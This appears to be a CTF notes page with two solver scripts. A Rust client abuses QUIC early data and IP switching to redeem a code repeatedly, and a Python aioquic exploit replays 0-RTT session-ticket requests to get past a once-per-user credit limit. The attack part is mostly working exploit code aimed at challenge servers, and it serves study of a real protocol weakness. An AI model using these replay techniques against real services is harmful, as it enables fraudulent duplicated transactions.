Skip to content

Categories

Quic

let me put this challenge clearly for those who didnt got what actually is 0rtt replay attack so basically in tls 1.3, client sends a clienthello along with some ciphers to use then server acknowledge...

Created

Updated

10 min read

Reading time

1 categories

Topics covered

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

QUIC early data IP Spoofing

Event NameUMD CTF 2025
GitHub URL-
Challenge Namegambling
Attachments
References

solver

use openvpn to change the ip

use color_eyre::Result;
use h3_quinn::Endpoint;
use http::header::{AUTHORIZATION, HOST};
use http::{Request, StatusCode};
use quinn::rustls;
use quinn::{ClientConfig, TokioRuntime};
use rand::prelude::*;
use std::sync::Arc;
use tokio::io::AsyncWriteExt;
use tokio::net::UdpSocket;

const HOSTNAME: &str = "gambling.challs.umdctf.io";
const ADDR: &str = "104.196.176.59:443";
const REDEMPTION_CODE: &[u8] =
    b"\"eW91IHRoaW5rIHlvdSdyZSBzcGVjaWFsIGJlY2F1c2UgeW91IGtub3cgaG93IHRvIGRlY29kZSBiYXNlNjQ/\"";

#[tokio::main]
async fn main() -> Result<()> {
    color_eyre::install()?;

    // https://github.com/hyperium/h3/blob/master/examples/client.rs
    let mut roots = rustls::RootCertStore::empty();
    let certs = rustls_native_certs::load_native_certs().unwrap();
    for cert in certs {
        roots.add(cert)?;
    }
    let mut tls_config = rustls::ClientConfig::builder()
        .with_root_certificates(roots)
        .with_no_client_auth();
    tls_config.enable_early_data = true;
    tls_config.alpn_protocols = vec![b"h3".to_vec()];
    let config = ClientConfig::new(Arc::new(quinn::crypto::rustls::QuicClientConfig::try_from(
        tls_config,
    )?));

    let socket = UdpSocket::bind("0.0.0.0:0").await?;
    let socket = socket.into_std()?;

    let mut endpoint = Endpoint::new(Default::default(), None, socket, Arc::new(TokioRuntime))?;
    endpoint.set_default_client_config(config);
    let conn = endpoint.connect(ADDR.parse()?, HOSTNAME)?.await?;
    let conn = h3_quinn::Connection::new(conn);
    let (mut driver, mut send_request) = h3::client::new(conn).await?;

    tokio::spawn(async move {
        std::future::poll_fn(|cx| driver.poll_close(cx)).await?;
        Ok::<(), h3::Error>(())
    });

    let rng = &mut rand::rng();
    let username = rng.next_u64().to_string();
    let password = rng.next_u64().to_string();
    let auth = format!(r#"{{"username":"{username}","password":"{password}"}}"#);

    let mut stdout = tokio::io::stdout();

    let req = Request::post(format!("https://{HOSTNAME}/register"))
        .header(HOST, HOSTNAME)
        .body(())?;
    let mut req_stream = send_request.send_request(req).await?;
    req_stream.send_data(auth.clone().into()).await?;
    req_stream.finish().await?;
    let res = req_stream.recv_response().await?;
    assert_eq!(res.status(), StatusCode::CREATED);

    let stdin = std::io::stdin();
    let buf = &mut String::new();

    for i in 0..3 {
        if i == 2 {
            println!("Change to first IP and press Enter");
            stdin.read_line(buf)?;
        }
        let req = Request::post(format!("https://{HOSTNAME}/redeem"))
            .header(HOST, HOSTNAME)
            .header(AUTHORIZATION, &auth)
            .body(())?;
        let mut req_stream = send_request.send_request(dbg!(req)).await?;
        if i == 1 {
            println!("Change to second IP and press Enter");
            stdin.read_line(buf)?;
        } else if i == 2 {
            println!("Change to third IP and press Enter");
            stdin.read_line(buf)?;
        }
        req_stream.send_data(REDEMPTION_CODE.into()).await?;
        req_stream.finish().await?;
        let res = req_stream.recv_response().await?;
        assert_eq!(dbg!(res).status(), StatusCode::NO_CONTENT);
    }

    println!("Change to first IP and press Enter");
    stdin.read_line(buf)?;

    let req = Request::post(format!("https://{HOSTNAME}/flag"))
        .header(HOST, HOSTNAME)
        .header(AUTHORIZATION, &auth)
        .body(())?;
    let mut req_stream = send_request.send_request(req).await?;
    req_stream.finish().await?;
    let res = req_stream.recv_response().await?;
    assert_eq!(res.status(), StatusCode::OK);

    while let Some(mut chunk) = req_stream.recv_data().await? {
        stdout.write_all_buf(&mut chunk).await?;
        stdout.flush().await?;
    }

    Ok(())
}

0RTT Attack

Event NameBackdoor CTF 2025
GitHub URL-
Challenge NameShop of life
Attachments
References

let me put this challenge clearly for those who didnt got what actually is 0rtt replay attack so basically in tls 1.3, client sends a clienthello along with some ciphers to use then server acknowledges it and continues the communication of data but this comes with a cost of latency with around 100-300ms and this requries 1RTT, but designers needed to speed down the data transfer so they

For connections to a server where the client and server possess a pre-shared key (PSK) the client may choose to encrypt early data under this key and send it along with the ClientHello src: (https://blog.trailofbits.com/2019/03/25/what-application-developers-need-to-know-about-tls-early-data-0rtt/) here PSK is derived from resumption_secret (i have logged this in the exp-logged.py)

so this 0RTT comes with faster speed of data transfer but also comes with cost of security

EXP
import asyncio
import json
import ssl
import sys
import binascii
from typing import Optional, Tuple

try:
    from aioquic.asyncio import connect
except ImportError:
    from aioquic.asyncio.client import connect  # older aioquic
from aioquic.h3.connection import H3_ALPN, H3Connection
from aioquic.h3.events import HeadersReceived, DataReceived, H3Event
from aioquic.asyncio import QuicConnectionProtocol
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.events import ProtocolNegotiated, QuicEvent
from aioquic.tls import SessionTicket

# Rich logging imports
from rich.console import Console
from rich.table import Table
from rich.panel import Panel
from rich.progress import Progress, SpinnerColumn, TextColumn
from rich.text import Text
from rich import print as rprint

try:
    from rich.traceback import install
    install(show_locals=True)
except ImportError:
    pass  # Fallback if rich not available

HOST = "localhost"
PORT = 4433 # change to 4433 if you moved HAProxy to 4433

TIMEOUT = 10.0  # seconds per request

console = Console()

class SessionTicketStore:
    def __init__(self):
        self._ticket: Optional[SessionTicket] = None
        self.ticket_history = []  # Track history for logging

    def add(self, ticket: SessionTicket) -> None:
        # Assign a simple ID for logging (e.g., first 8 hex chars of ticket)
        ticket_id = binascii.hexlify(ticket.ticket[:4]).decode().upper()
        ticket_num = len(self.ticket_history) + 1
        self.ticket_history.append(ticket_id)

        # Rich table for ticket details
        table = Table(title=f"New Session Ticket #{ticket_num} (ID: {ticket_id})", show_header=True, header_style="bold magenta")
        table.add_column("Field", style="cyan", no_wrap=True)
        table.add_column("Value", style="green")

        table.add_row("age_add", str(ticket.age_add))
        table.add_row("cipher_suite", str(ticket.cipher_suite))
        table.add_row("not_valid_after", str(ticket.not_valid_after))
        table.add_row("not_valid_before", str(ticket.not_valid_before))
        table.add_row("resumption_secret (hex, first 16)", binascii.hexlify(ticket.resumption_secret[:8]).decode())
        table.add_row("server_name", ticket.server_name)
        table.add_row("ticket (first 32 hex)", binascii.hexlify(ticket.ticket[:16]).decode())
        table.add_row("max_early_data_size", str(ticket.max_early_data_size))
        extensions_str = "; ".join([f"{ext_type}:{binascii.hexlify(ext_data[:8]).decode() + '...' if isinstance(ext_data, bytes) and len(ext_data) > 8 else str(ext_data)}" for ext_type, ext_data in ticket.other_extensions])
        table.add_row("other_extensions", extensions_str)

        console.print(table)
        console.print(Panel("Stored for future 0-RTT resumptions/replays", style="bold yellow"))

        self._ticket = ticket

    def get_current_ticket_id(self) -> str:
        if self._ticket is None:
            return "None (Full Handshake)"
        return binascii.hexlify(self._ticket.ticket[:4]).decode().upper()

    def fetch(self, label: bytes) -> Optional[SessionTicket]:
        # return without popping so we can reuse (server will rotate tickets)
        return self._ticket

class H3Client(QuicConnectionProtocol):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Initialize H3 immediately so we can send 0-RTT requests before
        # ProtocolNegotiated is fired.
        self.h3: Optional[H3Connection] = H3Connection(self._quic)
        self._resp_status: Optional[int] = None
        self._resp_body = bytearray()
        self._done = asyncio.Event()
        self._stream_id: Optional[int] = None
        self._resp_headers = []

    def quic_event_received(self, event: QuicEvent) -> None:
        if isinstance(event, ProtocolNegotiated):
            self.h3 = H3Connection(self._quic)
        if self.h3 is not None:
            for http_event in self.h3.handle_event(event):
                self.http_event_received(http_event)

    def http_event_received(self, event: H3Event) -> None:
        if isinstance(event, HeadersReceived) and self._stream_id is not None and event.stream_id == self._stream_id:
            self._resp_headers = event.headers
            for k, v in event.headers:
                if k == b":status":
                    try:
                        self._resp_status = int(v.decode())
                    except ValueError:
                        self._resp_status = None
        elif isinstance(event, DataReceived) and self._stream_id is not None and event.stream_id == self._stream_id:
            self._resp_body.extend(event.data)
            if event.stream_ended:
                self._done.set()

    def send_request(self, method: str, path: str, body: bytes = b"", headers: Optional[list] = None, authority: str = None):
        if self.h3 is None:
            self.h3 = H3Connection(self._quic)
        if authority is None:
            authority = HOST if PORT in (443, 80) else f"{HOST}:{PORT}"
        self._stream_id = self._quic.get_next_available_stream_id(is_unidirectional=False)
        hdrs = [
            (b":method", method.encode()),
            (b":scheme", b"https"),
            (b":authority", authority.encode()),
            (b":path", path.encode()),
        ]
        if headers:
            hdrs.extend(headers)
        self.h3.send_headers(stream_id=self._stream_id, headers=hdrs)
        if body:
            self.h3.send_data(stream_id=self._stream_id, data=body, end_stream=True)
        else:
            self.h3.send_data(stream_id=self._stream_id, data=b"", end_stream=True)
        self.transmit()

    async def request(self, method: str, path: str, body: bytes = b"", headers: Optional[list] = None) -> Tuple[int, bytes]:
        self.send_request(method, path, body, headers=headers)
        await self._done.wait()
        return (self._resp_status or 0, bytes(self._resp_body))


async def h3_request(store: SessionTicketStore, wait_connected: bool, method: str, path: str, body: bytes = b"", headers: Optional[list] = None, linger_after: float = 0.0, request_label: str = "") -> Tuple[int, bytes]:
    cfg = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
    cfg.verify_mode = ssl.CERT_NONE  # self-signed
    cfg.server_name = HOST
    # resume using stored ticket (enables 0-RTT when wait_connected=False)
    cfg.session_ticket = store._ticket

    current_ticket_id = store.get_current_ticket_id()
    is_0rtt = not wait_connected and store._ticket is not None
    mode_text = "🚀 0-RTT Replay (Early Data Attack!)" if is_0rtt else "🔄 1-RTT Resumption"
    console.print(f"\n[🐍 REPLAY SETUP] {request_label}: Using ticket ID [bold cyan]{current_ticket_id}[/bold cyan] for {mode_text}")
    if body:
        console.print(f"  📤 Sending payload: [italic]{body.decode(errors='ignore')}[/italic]")

    console.print(f"[🌐 H3] wait_connected={wait_connected} | method={method} | path={path} | body_len={len(body)} | early_data={is_0rtt}")

    async with connect(
        HOST, PORT,
        configuration=cfg,
        create_protocol=H3Client,
        wait_connected=wait_connected,
        session_ticket_handler=store.add,
    ) as proto:
        status, resp = await proto.request(method, path, body=body, headers=headers)
        # Debug: print Early-Data related headers seen in the response
        try:
            hdrs = getattr(proto, "_resp_headers", []) or []
            ed = None
            xed = None
            x0rtt = None
            xresumed = None
            xreqed = None
            for k, v in hdrs:
                lk = k.lower()
                if lk == b"early-data":
                    ed = v.decode(errors="ignore")
                if lk == b"x-early-data":
                    xed = v.decode(errors="ignore")
                if lk == b"x-0rtt":
                    x0rtt = v.decode(errors="ignore")
                if lk == b"x-ssl-resumed":
                    xresumed = v.decode(errors="ignore")
                if lk == b"x-req-early-data":
                    xreqed = v.decode(errors="ignore")
            if any(x is not None for x in (ed, xed, x0rtt, xresumed, xreqed)):
                console.print(f"[📡 H3] Response Headers: Early-Data=[{ed}] X-Early-Data=[{xed}] X-0RTT=[{x0rtt}] X-SSL-Resumed=[{xresumed}] X-Req-Early-Data=[{xreqed}]")
        except Exception:
            pass
        if linger_after > 0:
            await asyncio.sleep(linger_after)
        console.print(f"[🌐 H3] status={status} | body_len={len(resp)}")
        try:
            resp_json = json.loads(resp.decode(errors='ignore'))
            balance = resp_json.get('balance', 'N/A')
            impact_text = "💥 0-RTT Replay" if is_0rtt else "✅ Standard Request"
            console.print(f"[🎯 REPLAY IMPACT] Backend balance updated to: [bold green]{balance}[/bold green] (via {impact_text})")
            if 'can_afford_flag' in resp_json:
                flag_status = "🟢 YES! Enough for flag" if resp_json['can_afford_flag'] else "🔴 No (need more)"
                console.print(f"[🎯 REPLAY IMPACT] Can afford flag: {flag_status}")
        except Exception:
            console.print(f"[🎯 REPLAY IMPACT] Backend response: [dim]{resp.decode(errors='ignore')}[/dim]")
        return status, resp


async def main():
    console.print(Panel.fit("[bold red]🚀 0-RTT Replay Attack Exploit: Shop of Life Flag Grab[/bold red]", style="bold blue"))
    console.print("[italic]This script demonstrates session ticket reuse for 0-RTT replays to bypass redeem limits.[/italic]\n")

    store = SessionTicketStore()
    # 1) Register normally (no 0-RTT) to get user_id and a session ticket
    console.print(Panel("=== STEP 1: Initial Registration (Full 1-RTT Handshake) ===", style="bold green"))
    console.print("[dim]This establishes the first session and acquires a ticket for resumptions.[/dim]")
    try:
        status, body = await asyncio.wait_for(
            h3_request(
                store,
                True,
                "POST",
                "/register",
                body=b"{}",
                headers=[(b"content-type", b"application/json")],
                linger_after=0.5,
                request_label="Registration",
            ),
            timeout=TIMEOUT,
        )
    except Exception as e:
        console.print(f"[bold red]❌ Register failed: {repr(e)}[/bold red]")
        sys.exit(1)
    if status != 200:
        console.print(f"[bold red]❌ Register failed status: {status} | Body: {body.decode(errors='ignore')}[/bold red]")
        sys.exit(1)
    user_id = json.loads(body.decode()).get("user_id")
    console.print(f"[bold green]✅ Acquired user_id: [underline cyan]{user_id}[/underline cyan][/bold green]")

    # If no session ticket yet, try one more short-lived connection to let HAProxy issue it
    if store._ticket is None:
        console.print(Panel("=== STEP 1.5: Extra 1-RTT to Ensure Ticket Issuance ===", style="bold green"))
        for _ in range(5):
            try:
                await asyncio.wait_for(h3_request(store, True, "GET", "/", linger_after=0.7, request_label="Ticket Fetch"), timeout=TIMEOUT)
            except Exception:
                pass
            if store._ticket is not None:
                break

    # 2) Verify redeem only once over 1-RTT (but due to HAProxy misconfig, it allows more)
    console.print(Panel("=== STEP 2: 1-RTT Redeems (Resumed Sessions, but Header Tricks Backend) ===", style="bold yellow"))
    console.print("[dim]HAProxy sets 'Early-Data:1' for ANY resumed session on /redeem, bypassing the 'once' limit.[/dim]")
    redeem_payload = json.dumps({"user_id": user_id}).encode()
    s1, b1 = await asyncio.wait_for(
        h3_request(
            store,
            True,
            "POST",
            "/api/redeem",
            body=redeem_payload,
            headers=[(b"content-type", b"application/json")],
            request_label="First 1-RTT Redeem",
        ),
        timeout=TIMEOUT,
    )
    console.print(f"[bold yellow]📊 1-RTT redeem status: {s1} | Body: {b1.decode(errors='ignore')}[/bold yellow]")
    s2, b2 = await asyncio.wait_for(
        h3_request(
            store,
            True,
            "POST",
            "/api/redeem",
            body=redeem_payload,
            headers=[(b"content-type", b"application/json")],
            request_label="Duplicate 1-RTT Redeem (Should Fail, But Doesn't!)",
        ),
        timeout=TIMEOUT,
    )
    console.print(f"[bold yellow]📊 Duplicate 1-RTT redeem status: {s2} | Body: {b2.decode(errors='ignore')}[/bold yellow]")

    # 3) Make multiple 0-RTT redeems (use wait_connected=False so data goes as early data)
    console.print(Panel("=== STEP 3: 0-RTT Replay Attack (Core Vulnerability) ===", style="bold red"))
    console.print("[dim]Reusing tickets for 0-RTT: Backend skips duplicate check due to 'Early-Data:1' header.[/dim]")
    console.print("[dim]Each 'replay' sends the same redeem payload instantly, inflating balance without limits.[/dim]")

    # Use rich.progress for the replay loop
    with Progress(
        SpinnerColumn(),
        TextColumn("[progress.description]{task.description}"),
        console=console
    ) as progress:
        task = progress.add_task("[bold red]Executing 0-RTT Replays...", total=10)
        for i in range(10):
            replay_label = f"0-RTT Replay #{i+1} (Cheap & Fast!)"
            status, body = await asyncio.wait_for(
                h3_request(
                    store,
                    False,
                    "POST",
                    "/api/redeem",
                    body=redeem_payload,
                    headers=[(b"content-type", b"application/json")],
                    request_label=replay_label,
                ),
                timeout=TIMEOUT,
            )
            txt = body.decode(errors="ignore")
            console.print(f"[bold red]🔄 Redeem {i + 1} status: {status} | Body: {txt}[/bold red]")
            progress.update(task, advance=1, description=f"[bold green]Replay {i+1}: Balance → {json.loads(txt).get('balance', 'N/A')}[/bold green]")
            try:
                obj = json.loads(txt)
                if obj.get("can_afford_flag"):
                    console.print(f"[bold green]🎉 [REPLAY SUCCESS] Reached 500+ balance after {i+1} replays! Ready for flag purchase.[/bold green]")
                    break
            except Exception:
                pass
        progress.update(task, completed=10)

    console.print(Panel("=== STEP 4: Buy the Flag (1-RTT for Safety) ===", style="bold green"))
    buy_payload = json.dumps({"user_id": user_id, "item": "flag"}).encode()
    status, body = await asyncio.wait_for(
        h3_request(
            store,
            True,
            "POST",
            "/api/buy",
            body=buy_payload,
            headers=[(b"content-type", b"application/json")],
            request_label="Flag Purchase",
        ),
        timeout=TIMEOUT,
    )
    console.print(f"[bold green]🛒 Buy flag status: {status} | Body: {body.decode(errors='ignore')}[/bold green]")

    console.print(Panel("=== STEP 5: Retrieve Flag ===", style="bold green"))
    status, body = await asyncio.wait_for(
        h3_request(store, True, "GET", f"/flag?user_id={user_id}", request_label="Flag Retrieval"),
        timeout=TIMEOUT,
    )
    console.print(f"[bold green]🏆 Flag status: {status} | Body: {body.decode(errors='ignore')}[/bold green]")

    if status == 200:
        console.print(Panel.fit("[bold green]🎉 EXPLOIT COMPLETE: SUCCESS![/bold green]\n[dim]The 0-RTT replays bypassed the backend's 'once per user' limit, allowing arbitrary credits.[/dim]", style="bold green on black"))
        return
    console.print("[bold red]❌ FAILED[/bold red]")
    sys.exit(1)


if __name__ == "__main__":
    asyncio.run(main())

Categories & Topics

This note is categorized under the following topics. Click on any category to explore more related content.

Share this note

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.